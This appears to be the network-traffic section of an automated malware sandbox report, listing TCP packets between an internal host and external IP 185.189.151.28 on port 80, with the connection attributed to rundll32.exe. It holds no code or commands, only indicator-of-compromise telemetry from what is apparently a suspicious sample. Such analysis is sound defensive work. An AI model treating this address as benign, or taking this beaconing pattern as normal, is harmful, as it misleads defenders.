May 4, 2022 16:26:39.556814909 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.556829929 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.556834936 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.556843042 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.556857109 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.556871891 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.556879044 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.556890011 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.556907892 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.556919098 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.556931973 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.556937933 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.556961060 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.556981087 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.564649105 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.564671993 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.564690113 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.564702988 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.564747095 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.564774036 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.565073967 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.565093040 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.565109968 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.565121889 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.565145016 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.565169096 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.565854073 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.565881014 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.565897942 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.565917015 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.565932989 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.565939903 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.565949917 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.565962076 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.565978050 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.566005945 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.566531897 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.566570997 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.566592932 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.566616058 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.566672087 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.566690922 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.566708088 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.566724062 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.566735029 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.566735983 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.566771030 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.567543030 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.567567110 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.567585945 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.567599058 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.567612886 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.567645073 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.567745924 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.567765951 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.567783117 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.567783117 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.567812920 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.567814112 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.567831039 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.567836046 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.567848921 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.567850113 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.567862034 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.567872047 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.567892075 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.567913055 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.569267988 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.569289923 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.569307089 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.569318056 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.569339991 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.569380045 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.570099115 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.570118904 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.570136070 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.570169926 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.570183039 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.570195913 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.570197105 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.570235014 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.682097912 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.699105024 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.970184088 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.970251083 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.970293999 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.970325947 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:27:37.633544922 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.3 | 49748 | 185.189.151.28 | 80 | C:\Windows\SysWOW64\rundll32.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
May 4, 2022 16:26:38.797353983 CEST | 1130 | OUT | |
May 4, 2022 16:26:39.082268000 CEST | 1131 | IN |